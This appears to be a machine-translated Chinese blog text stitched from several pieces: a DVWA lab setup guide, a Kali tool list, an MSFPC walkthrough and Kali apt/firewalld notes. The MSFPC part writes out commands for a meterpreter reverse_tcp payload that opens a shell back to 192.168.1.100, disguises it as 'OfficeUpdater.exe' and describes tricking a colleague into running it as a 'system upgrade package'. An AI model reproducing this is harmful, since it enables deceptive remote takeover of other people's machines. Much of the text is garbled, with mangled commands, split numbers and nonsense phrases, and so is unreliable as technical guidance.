DVWA1:环境搭建

说实话,说到DVWA环境,我第一次设置的时候虚拟机差点就崩溃了。
说实话,有很多层次;但MySQL有它自己的技巧,每一步都比较困难。
让我告诉你我当时是怎么生活的。

1 .对于虚拟机层面,我直接使用KaliLinux的官方镜像。
不要低估这个形象。
专为渗透测试而准备。
干净整洁。
当时我是用VirtualBox安装的。
无论如何,我只需点击几次鼠标并选择“下载 KaliLinux”,它就会自动下载并创建一个新的虚拟机。
请记住,默认用户名是 root,密码是多余的。
这需要改变。
不然以后会有问题。
安装后,我更改了密码和sudo权限;不然以后就无法连接MySQL了。

2 对于DVWA下载步骤;我直接在 GitHub 上搜索ethicalhack3 r/DVWA 存储库。
说实话,GitHub上有好几个版本,我当时差点就搞错了,所以就选择了最新的一个。
下载压缩包后,拖放到虚拟机中并解压。
不要考虑使用SSH来传输。
环境首次安装时网络配置可能不完整。
最简单的方法就是把它拖下来。

3 我当时没有做这一步来配置虚拟机环境。
但后来我发现,如果你在虚拟机中安装了其他系统(比如Windows),使用Samba来共享文件确实可以很方便。
将压缩后的DVWA文件夹拖入Windows共享目录并安装在虚拟机中。
这一步实际上是可选的;这取决于你的个人习惯。

4 在SSH初始化阶段;我走进了陷阱。
Kali默认禁用SSH服务;你必须自己开始。
当时直接使用service ssh start 就报错了。
查了资料发现Kali可以调用SSH服务sshd。
开始使用 sshd 服务。
对于配置端口转发的步骤,我使用VirtualBox自带的端口转发将虚拟机的2 2 端口映射到主机上的某个端口。
这样你就可以使用Xshell从Windows连接到虚拟机。

5 在缩放和移动 DVWA 的这个阶段;直接使用tar -xvf dvwa.zip进行压缩;然后将mv命令移动到/var/www/。
此阶段不要移动手。
否则,如果路径错误,数据库配置将被损坏。

6 在设置文件权限的步骤中;我首先使用 chmod -R 7 5 5 dvwa 但发现网页无法打开。
核对信息后;这成为一个权限问题。
sudo chown -R www-data:www-data /var/www//dvwa;然后你必须使用 chmod -R 7 5 5 /var/www//dvwa。
记住这一步;如果 Linux 权限弄错了,那真是令人头疼。

7 在配置MySQL数据库的阶段,我陷入了最大的缺陷。
Kali默认的MySQL root密码为空,但是登录的时候必须输入密码,当时我就很困惑。
后来我通过更改配置文件修复了它。
具体操作为:启动服务mysql后mysql -u root;进入MySQL,结合dvwa字符集utf8 ,创建数据库utf8 _general_ci;然后编辑/var/www//dvwa/config.inc.php.dist,更改数据库结构;将其重命名为 config.inc.php。
8 .在Apache2 启动阶段;直接启动apache2 服务即可。
安装完后尝试了一下,发现默认页面是Apache的欢迎页面,于是赶紧改了主页文件。

9 适用于入门级 DVWA;最简单的测试方法是在浏览器中打开1 2 7 .0.0.1 /dvwa并创建数据库。
默认用户名是admin,密码是password。
第一次看到登录界面,环境搭建完毕当我感受到的时候,我非常兴奋。

老实说,整个过程中最麻烦的部分是MySQL。
特别是权限和配置文件。
我花了两个小时试图完成它,最后意识到这是一个小错误。
进入时查看更多信息;别像我一样担心。
如果遇到问题,可以查看 DVWA 的 GitHub 问题。
很多人都经历过和你一样的事情。

kali linux有哪些工具

KaliLinux 工具非常方便。

Nmap 快速扫描端口。
Skipfish 扫描网站并发现漏洞。
Nikto 检查服务器配置是否不正确。
Wireshark 捕获数据包以查看流量​​。

Metasploit 利用漏洞。
sqlmap 从事 SQL 注入。
BeEF 测试浏览器很弱。
耶尔森氏菌攻击互联网。

Hydra暴力破解。
约翰破解了密码。
Aircrack-ng 破解 WiFi。
WPScan 检查 WordPress。

BurpSuite 测试网络。
KingPhisher 钓鱼。
尸检检查数据。
Apktool反编译Android。

Lyni的评估系统。
Maltego 绘制关系图。
电线可防止入侵。
SET 测试人员并防止欺诈。

Nessus 扫描漏洞。
你自己掂量一下吧。

网络安全工程师演示:白帽黑客如何使用MSFPC半自动化生成强大的木马Payload?【实战篇】

等等,上次我用这个的时候,我花了很长时间摆弄我放在箱子角落里的笔记本电脑。
中午之前阳光明媚,但帐篷里的光线太亮了。

场景:我记得在 Kali 虚拟机上运行这个过程,并匆忙地复制和粘贴命令。
Apache服务一直报错,说配置文件有问题。
折腾了大约半个小时,终于在/etc/apache2 /apache2 .conf中发现了拼写错误。
工具准备:
MSFPC对于新手来说确实是个好消息。
之前用msfvenom的时候,参数堆积如山,得一直查文档。
后来我改用MSFPC,就简单多了。
例如,要生成 windows/meterpreter/reverse_tcp,您可以使用一行命令来完成: 羞愧 msfpc windowsmetermeterreverse_tcp LHOST=1 9 2 .1 6 8 .1 .1 00 LPORT=5 5 5 5 然后将生成的文件直接发送到/var/www//,并使用Crisp下载给我的同事——他还问我为什么突然发“系统升级包”。

进程渗透: 1 、Apache启动:记得apache2 服务运行时,虚拟机卡住了几秒,屏幕上飘出“账户已注册3 天,2 3 :5 9 :01 ”一行字。
当时我就在想为什么这个虚拟机还有读日志呢? 2 . 有效负载生成: 羞愧 msfpc windows metri metri verso_tcp LHOST=1 9 2 .1 6 8 .1 .1 00 LPORT=5 5 5 5 生成的文件名为 windows-meter-interpres-tcp-5 5 5 5 .exe。
我将名称更改为“OfficeUpdater.exe”,但当受害者单击它时,会出现一个“Microsoft Office”弹出窗口,该窗口已更新。
3 、直接下载:我用手机热点将攻击机的IP改为1 9 2 .1 6 8 .1 .1 01 ,然后用电脑浏览器访问http://1 9 2 .1 6 8 .1 .1 01 /OfficeUpdater.exe。
当他点击下载时,我看着屏幕,数了数心跳——它立即保存了。

刀和贝壳: 羞愧 msfconsole -q -r /root/windows-meterpreter-verso-tcp-5 5 5 5 -exe.rc 然后我进入会话 -i 1 并看到解释器提示。
我正在连接到 sysinfo,并且版本信息窗口中的屏幕上浮动着一个文件。
我突然想到——我上周刚刚升级了系统,Payload可以立即适应版本。

乱码问题:进入shell模式后,命令行完全乱码。
赶紧chcp 6 5 001 ,这才发现电脑的C盘盘符已经变成了“C”。

突然想到:如何过墙?上次我用Nmap扫描时,我发现机器上有一个奇怪的“云安全助手”进程,正在监听4 4 3 端口。
等等,那是什么?

kali Linux初体验,更换apt源以及使用firewalld

上周我开始尝试KaliLinux,其中涉及修改apt源和firewalld配置。
使用的是kali-linux-2 02 2 .3 -vmware-amd6 4 ,但是我使用的是VMware版本的kali-linux-2 02 2 .2 -vmware-amd6 4 登录时初始用户和密码为kali,但新版本中root密码已更改,因此需要使用bashsudopasswdroot进行更改。
出于安全原因,您需要添加端口 2 2 并使用 root 权限更新并重新启动 ssh 服务。

朋友建议使用第三方终端工具登录。
更改root权限有两种方法:su-或suroot。
需要更改apt源,例如阿里、腾讯、清华,保证源地址可以使用。
使用 apt 或 sudoapt 更新源和包。
建议只保留一种防火墙管理工具,例如禁用 iptables 并使用firewalld。

要重新启动ssh服务,还需要将其设置为启动时自动启动。
如果您遇到连接问题,请检查端口和防火墙设置。
您可能还需要更改 MySQL (3 3 06 ) 和 Apache2 (8 0) 等服务的默认端口以提高安全性。
要在 Kali 上安装firewalld,您需要执行基本配置。
在使用firewalld-cmd命令之前,请确保firewalld服务已启用。

值得注意的是,Kali 默认情况下阻止 root 用户通过 ssh 登录。
您需要按照以下步骤操作。
顺便说一句,我想,安装完软件后,别忘了更新软件列表。
算了,你懂的。